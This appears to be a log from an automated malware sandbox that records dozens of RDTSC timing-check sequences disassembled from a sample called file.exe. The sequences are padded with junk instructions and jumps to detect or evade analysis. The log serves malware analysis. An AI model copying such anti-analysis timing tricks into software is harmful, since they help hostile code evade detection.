Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ADDD3 second address: 8ADE36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FAA34ECFF5Eh 0x0000000f jc 00007FAA34ECFF56h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a jmp 00007FAA34ECFF62h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jno 00007FAA34ECFF62h 0x00000028 jno 00007FAA34ECFF56h 0x0000002e jne 00007FAA34ECFF56h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BFF34 second address: 8BFF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BFF3A second address: 8BFF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FAA34ECFF6Ch 0x0000000e jmp 00007FAA34ECFF66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1FAF second address: 8C1FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAA34DB19BEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1FC5 second address: 8C1FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1FCB second address: 8C1FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A4447 second address: 7A4495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF66h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 jmp 00007FAA34ECFF67h 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007FAA34ECFF5Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1B15 second address: 8C1B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAA34DB19B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1B26 second address: 8C1B2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1B2C second address: 8C1B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAA34DB19BCh 0x0000000c jp 00007FAA34DB19B6h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1B41 second address: 8C1B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAA34ECFF56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1C8D second address: 8C1CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAA34DB19BEh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1CBA second address: 8C1CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1CBE second address: 8C1CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1CC7 second address: 8C1CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C1CCC second address: 8C1CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4434 second address: 8C443A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C443A second address: 8C4449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FAA34DB19B6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4449 second address: 8C4483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF5Bh 0x00000007 jmp 00007FAA34ECFF5Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FAA34ECFF6Eh 0x00000014 jmp 00007FAA34ECFF66h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4483 second address: 8C449F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C449F second address: 8C44E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34ECFF69h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FAA34ECFF73h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4334 second address: 8D4351 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FAA34DB19C3h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4351 second address: 8D4361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FAA34ECFF58h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4361 second address: 8D438B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19BFh 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007FAA34DB19B6h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FAA34DB19BBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3223 second address: 8D323C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FAA34ECFF5Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3794 second address: 8D3798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3AED second address: 8D3AF7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAA34ECFF56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C34 second address: 8D3C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jg 00007FAA34DB19B6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C44 second address: 8D3C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3EB6 second address: 8D3ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19C2h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3ECD second address: 8D3F08 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAA34ECFF69h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAA34ECFF62h 0x00000012 jne 00007FAA34ECFF62h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3F08 second address: 8D3F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAA34DB19B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3F12 second address: 8D3F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5A0C second address: 8D5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D82D6 second address: 8D8302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007FAA34ECFF5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FAA34ECFF67h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8302 second address: 8D8308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8308 second address: 8D830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D839D second address: 8D83A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D85B5 second address: 8D85EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAA34ECFF56h 0x0000000a popad 0x0000000b jbe 00007FAA34ECFF5Ch 0x00000011 jp 00007FAA34ECFF56h 0x00000017 popad 0x00000018 mov dword ptr [esp], eax 0x0000001b push ecx 0x0000001c mov dx, ax 0x0000001f pop edx 0x00000020 push 00000004h 0x00000022 mov edx, dword ptr [ebp+1246823Fh] 0x00000028 call 00007FAA34ECFF59h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D85EC second address: 8D85F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D85F0 second address: 8D85F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D85F6 second address: 8D8670 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAA34DB19BEh 0x00000008 jmp 00007FAA34DB19BDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FAA34DB19C8h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007FAA34DB19BAh 0x0000001f mov eax, dword ptr [eax] 0x00000021 jmp 00007FAA34DB19BDh 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c js 00007FAA34DB19CDh 0x00000032 jmp 00007FAA34DB19C7h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB8DF second address: 8DB8ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAA34ECFF5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB8ED second address: 8DB929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAA34DB19CCh 0x0000000a pushad 0x0000000b jnc 00007FAA34DB19B6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jp 00007FAA34DB19B6h 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 jnl 00007FAA34DB19B6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC040E second address: 4DC0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0413 second address: 4DC041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC041A second address: 4DC044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007FAA34ECFF65h 0x00000010 pop ecx 0x00000011 call 00007FAA34ECFF61h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC044E second address: 4DC0454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0454 second address: 4DC0458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0458 second address: 4DC045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC045C second address: 4DC04C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAA34ECFF62h 0x00000012 adc esi, 37DD2DF8h 0x00000018 jmp 00007FAA34ECFF5Bh 0x0000001d popfd 0x0000001e call 00007FAA34ECFF68h 0x00000023 push esi 0x00000024 pop edi 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAA34ECFF68h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC04FF second address: 4DC0503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0503 second address: 4DC0509 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0509 second address: 4DC0541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAA34DB19BCh 0x0000000b sbb cx, B778h 0x00000010 jmp 00007FAA34DB19BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov ebx, esi 0x0000001d mov cx, 44A7h 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bh, cl 0x00000028 mov esi, edx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0541 second address: 4DC0547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0547 second address: 4DC054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC054B second address: 4DC055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC055A second address: 4DC055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC055E second address: 4DC0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0562 second address: 4DC0568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F606C second address: 7F607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0CBB second address: 4DC0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0CC1 second address: 4DC0CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0CC7 second address: 4DC0D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007FAA34DB19BCh 0x00000013 mov ch, F3h 0x00000015 pop ebx 0x00000016 jmp 00007FAA34DB19BCh 0x0000001b popad 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0D06 second address: 4DC0D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FAA34ECFF67h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bh, 80h 0x00000018 movzx esi, dx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0030 second address: 4DE00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAA34DB19C6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FAA34DB19BEh 0x00000018 sbb esi, 342647B8h 0x0000001e jmp 00007FAA34DB19BBh 0x00000023 popfd 0x00000024 jmp 00007FAA34DB19C8h 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FAA34DB19BEh 0x00000032 or al, 00000048h 0x00000035 jmp 00007FAA34DB19BBh 0x0000003a popfd 0x0000003b movzx esi, bx 0x0000003e popad 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov edx, 611B6542h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE00C2 second address: 4DE00C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE00C7 second address: 4DE0194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 7921AFCBh 0x00000008 mov ecx, 70997DA7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ecx 0x00000011 jmp 00007FAA34DB19BAh 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FAA34DB19BEh 0x0000001e xor eax, 18005608h 0x00000024 jmp 00007FAA34DB19BBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FAA34DB19C8h 0x00000030 adc cl, 00000068h 0x00000033 jmp 00007FAA34DB19BBh 0x00000038 popfd 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FAA34DB19BFh 0x00000042 or si, 3BAEh 0x00000047 jmp 00007FAA34DB19C9h 0x0000004c popfd 0x0000004d mov ecx, 65023037h 0x00000052 popad 0x00000053 xchg eax, ecx 0x00000054 jmp 00007FAA34DB19BAh 0x00000059 push dword ptr [ebp+08h] 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f pushfd 0x00000060 jmp 00007FAA34DB19BCh 0x00000065 xor si, D058h 0x0000006a jmp 00007FAA34DB19BBh 0x0000006f popfd 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0194 second address: 4DE01A6 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE01A6 second address: 4DE01AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE02B8 second address: 4DE0311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAA34ECFF61h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FAA34ECFF5Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAA34ECFF67h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0311 second address: 4DE0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAA34DB19C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0329 second address: 4DE0383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d jmp 00007FAA34ECFF66h 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 jmp 00007FAA34ECFF5Eh 0x0000001a mov ah, 03h 0x0000001c popad 0x0000001d push dword ptr [ebp+1Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FAA34ECFF68h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0383 second address: 4DE03F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+18h] 0x0000000e pushad 0x0000000f mov ecx, 0958A561h 0x00000014 mov al, 36h 0x00000016 popad 0x00000017 push dword ptr [ebp+14h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FAA34DB19BFh 0x00000021 add cx, 7F0Eh 0x00000026 jmp 00007FAA34DB19C9h 0x0000002b popfd 0x0000002c push eax 0x0000002d mov ah, dl 0x0000002f pop ecx 0x00000030 popad 0x00000031 push dword ptr [ebp+10h] 0x00000034 jmp 00007FAA34DB19BFh 0x00000039 push dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f call 00007FAA34DB19BBh 0x00000044 pop esi 0x00000045 mov esi, edx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE03F9 second address: 4DE03FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE03FF second address: 4DE0403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0694 second address: 4DC069A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
